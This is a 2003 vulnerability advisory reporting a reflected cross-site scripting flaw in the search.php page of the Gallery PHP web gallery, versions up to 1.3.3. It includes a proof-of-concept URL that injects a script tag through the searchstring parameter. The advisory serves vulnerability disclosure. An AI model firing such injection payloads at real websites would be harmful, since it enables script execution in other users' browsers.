#######################################################################

Application:    Gallery
Vendors:
http://gallery.sourceforge.net
http://gallery.menalto.com
Versions:        <= 1.3.3
Platforms:       Windows/Unix
Bug:                 Cross Site Scripting Vulnerabillity
Risk:                Low
Exploitation:   Remote with browser
Date:               30 Dec 2003
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com
web:                http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bug
3) The Code

#######################################################################

===============
1) Introduction
===============


Gallery 1.3.3 is an automated php Gallery engine. It is quite secure, and
very effective as a
web gallery.

#######################################################################

======
2) Bug
======

When the webserver hosting gallery 1.3.3 recieves a "GET
/<galleryfolder>/search.php"
it reffers to search.php as it should. However when searching
"<script>alert('XSS')</script>"
or requests "GET
/<galleryfolder>/search.php?searchstring=<script>alert('XSS')</script>"
the server allows an attacker so inject & execute scripts.

#######################################################################

===========
3) The Code
===========

http://<host>/<galleryfolder>/search.php?searchstring=<script>alert('XSS')</
script>

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."